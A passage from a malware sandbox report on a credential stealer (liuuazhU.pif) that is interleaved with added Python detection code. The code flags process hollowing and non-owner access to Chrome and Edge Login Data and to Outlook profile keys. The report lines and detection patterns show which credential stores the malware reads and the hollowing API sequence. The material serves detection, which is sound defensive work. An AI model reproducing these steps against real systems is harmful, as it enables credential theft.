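    r'Source: C:\Users\user\AppData\Local\Temp\x.exe | Section unmapped: C:\Users\Public\Libraries\liuuazhU.pif base address: 400000',
    r'Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Section unmapped: C:\Users\Public\Libraries\liuuazhU.pif base address: 400000',
    r'Source: C:\Users\user\AppData\Local\Temp\x.exe | Memory written: C:\Users\Public\Libraries\liuuazhU.pif base: 204008',
    r'Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Memory written: C:\Users\Public\Libraries\liuuazhU.pif base: 295008',
    r'Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"',
    r'Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif',
    r'Source: C:\Users\Public\Libraries\Uhzauuil.PIF | Process created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif',
]

# Optional column separator so the patterns also match lines whose "Source:"
# column was fused onto the action name, as happens in raw text extractions.
_SEP = r"\s*\|?\s*"
_HEX = r"(?P<base>[0-9A-Fa-f]+)"
PATTERNS = {
    "memory_allocated": re.compile(
        r"^Source:\s*(?P<actor>.+?)" + _SEP + r"Memory allocated:\s*(?P<target>.+?)"
        r"\s+base:\s*" + _HEX + r"\s+protect:\s*(?P<protect>.+?)\s*$"),
    "section_unmapped": re.compile(
        r"^Source:\s*(?P<actor>.+?)" + _SEP + r"Section unmapped:\s*(?P<target>.+?)"
        r"\s+base address:\s*" + _HEX + r"\s*$"),
    "memory_written": re.compile(
        r"^Source:\s*(?P<actor>.+?)" + _SEP + r"Memory written:\s*(?P<target>.+?)"
        r"\s+base:\s*" + _HEX + r"\s*$"),
    "process_created": re.compile(
        r"^Source:\s*(?P<actor>.+?)" + _SEP + r"Process created:\s*(?P<target>\S+)"),
}


def parse(lines):
    """Turn report lines into event dicts; lines of other kinds are skipped."""
    events = []
    for line in lines:
        for kind, rx in PATTERNS.items():
            m = rx.match(line.strip())
            if m:
                ev = m.groupdict()
                ev["kind"] = kind
                if "base" in ev:
                    ev["base"] = int(ev["base"], 16)
                events.append(ev)
                break
    return events


def is_rwx(protect):
    p = protect.lower()
    return "execute" in p and "write" in p


def correlate(events):
    """Score every (actor, target) pair for the hollowing pattern.

    Hollowing needs all of: the actor spawned the target, unmapped the
    target's image at its base, allocated RWX memory at that same base and
    wrote into the target. The report does not preserve call order, so each
    step is checked for presence, not sequence. Pairs are keyed on image
    path because that is all the report exposes; real telemetry should key
    on PIDs.
    """
    by_pair = defaultdict(lambda: defaultdict(list))
    for ev in events:
        by_pair[(ev["actor"], ev["target"])][ev["kind"]].append(ev)
    findings = []
    for (actor, target), steps in by_pair.items():
        unmapped = {e["base"] for e in steps["section_unmapped"]}
        rwx_at_unmapped = sorted(e["base"] for e in steps["memory_allocated"]
                                 if is_rwx(e["protect"]) and e["base"] in unmapped)
        writes = [e["base"] for e in steps["memory_written"]]
        # Heuristic, an inference the report itself does not make: in a 32-bit
        # process the PEB's ImageBaseAddress field sits at PEB+0x8, and a
        # hollower has to update it after remapping the image. Writes whose
        # address ends in 0x008 are flagged as candidates, never relied on.
        peb_writes = [hex(b) for b in writes if (b & 0xFFF) == 0x008]
        findings.append({
            "actor": actor,
            "target": target,
            "spawned": bool(steps["process_created"]),
            "image_base": rwx_at_unmapped[0] if rwx_at_unmapped else None,
            "writes": [hex(b) for b in writes],
            "peb_image_base_write_candidates": peb_writes,
            "hollowing": bool(steps["process_created"]) and bool(rwx_at_unmapped) and bool(writes),
        })
    return findings


def hollowing_findings(lines=REPORT_LINES):
    """Only the pairs that satisfy the full hollowing pattern."""
    return [f for f in correlate(parse(lines)) if f["hollowing"]]


if __name__ == "__main__":
    for f in hollowing_findings():
        print(f"{f['actor']} hollowed {f['target']} at {f['image_base']:#x}; "
              f"writes={f['writes']} peb_candidates={f['peb_image_base_write_candidates']}")
```

On the report's lines this yields two findings, x.exe and Uhzauuil.PIF both hollowing liuuazhU.pif at 0x400000, while the wscript.exe to x.exe pair stays a plain process creation. Because the report identifies processes by image path, the duplicated Uhzauuil.PIF lines (two different write addresses, 295008 and 370008) most likely belong to two separate instances that the path-based key merges; on live telemetry, key on PID and require the order CreateProcess (suspended), NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext/ResumeThread.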

            Stealing of Sensitive Information

            Source: Yara match | File source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTR

            Source: Yara match | File source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTR

            Source: C:\Users\Public\Libraries\liuuazhU.pif | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\Public\Libraries\liuuazhU.pif | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\Public\Libraries\liuuazhU.pif | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Source: Yara match | File source: 00000006.00000002.3109531523.000000001D421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3110411476.000000001C8BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3109531523.000000001D5BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000011.00000002.3110411476.000000001C7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3117150961.000000002AD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTR
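The "File opened" and "Key opened" lines in this section show liuuazhU.pif reading the Chrome and Edge Login Data databases (the SQLite files that hold saved logins) and the Outlook MAPI profile section 9375CFF0413111d3B88A00104B2A6676, which is where Outlook keeps account settings; these are the accesses behind the report's "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures. The Python below is an added example, not from the report or from Joe Sandbox: it turns those observations into a detection that alerts when a process other than the store's own application opens a credential store, and rates a process touching more than one store class higher. The telemetry tuples are constructed from this section's lines plus two benign controls; the store table, owner lists, the suspicious-image heuristic and the severity thresholds are the example's own choices.

```python
"""Flag credential-store access by processes that do not own the store.

Added example, not from the Joe Sandbox report or its tooling. The events are
constructed from this section's "File opened" and "Key opened" lines plus two
benign controls; field names, owner lists and thresholds are this example's.
"""
import re
from collections import defaultdict

# Stores seen in the report and the images that legitimately open them.
# 9375CFF0413111d3B88A00104B2A6676 is the MAPI profile section holding
# Outlook account settings, which is why mail stealers read it.
CREDENTIAL_STORES = [
    ("chromium_login_data",
     re.compile(r"\\(google\\chrome|microsoft\\edge)\\user data\\[^\\]+\\login data$"),
     {"chrome.exe", "msedge.exe"}),
    ("outlook_mapi_profile",
     re.compile(r"\\windows messaging subsystem\\profiles\\.*\\9375cff0413111d3b88a00104b2a6676$"),
     {"outlook.exe"}),
]

# Constructed telemetry: (process image, event kind, object path).
EVENTS = [
    (r"C:\Users\Public\Libraries\liuuazhU.pif", "file_open",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Users\Public\Libraries\liuuazhU.pif", "file_open",
     r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"),
    (r"C:\Users\Public\Libraries\liuuazhU.pif", "key_open",
     r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    # Controls: the owning browser reading its own store, and an unrelated file.
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file_open",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Users\Public\Libraries\liuuazhU.pif", "file_open",
     r"C:\Windows\System32\mswsock.dll"),
]


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_image(path):
    """Secondary indicator matching what the report itself observes: a PE
    carrying a non-standard executable extension, or running from the
    world-writable public profile."""
    p = path.lower()
    return p.endswith((".pif", ".scr", ".com")) or "\\users\\public\\" in p


def classify(process, obj):
    """Return (store_label, owned_by_process) or None when obj is not a store."""
    low = obj.lower()
    for label, rx, owners in CREDENTIAL_STORES:
        if rx.search(low):
            return label, image_name(process) in owners
    return None


def scan(events=EVENTS):
    """One alert per credential-store access by a non-owner process."""
    alerts = []
    for process, kind, obj in events:
        hit = classify(process, obj)
        if hit is None:
            continue
        label, owned = hit
        if owned:
            continue  # the store's own application reading it
        alerts.append({"process": process, "kind": kind, "store": label,
                       "object": obj, "suspicious_image": suspicious_image(process)})
    return alerts


def summarize(alerts):
    """Per process: the distinct stores touched and a severity. Touching more
    than one store class is the signature of a generic stealer and weighs
    more than a single access; a suspicious image adds one point."""
    per_proc = defaultdict(set)
    for a in alerts:
        per_proc[a["process"]].add(a["store"])
    out = {}
    for proc, stores in per_proc.items():
        score = len(stores) + (1 if suspicious_image(proc) else 0)
        severity = "high" if score >= 3 else "medium" if score == 2 else "low"
        out[proc] = {"stores": stores, "severity": severity}
    return out


if __name__ == "__main__":
    for proc, info in summarize(scan()).items():
        print(f"{info['severity'].upper()} {proc}: {sorted(info['stores'])}")
```

Run against the constructed events, only liuuazhU.pif is reported: two store classes plus the .pif-in-Public indicator give it the high rating, while chrome.exe opening its own Login Data and the mswsock.dll access produce nothing. Keep the owner lists tight; adding helper processes of the browser or mail client is where such rules quietly lose coverage.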

            Remote Access Functionality

            Source: Yara matchFile source: 6.3.liuuazhU.pif.1b37a088.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0f08.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c17772e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f5570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPE
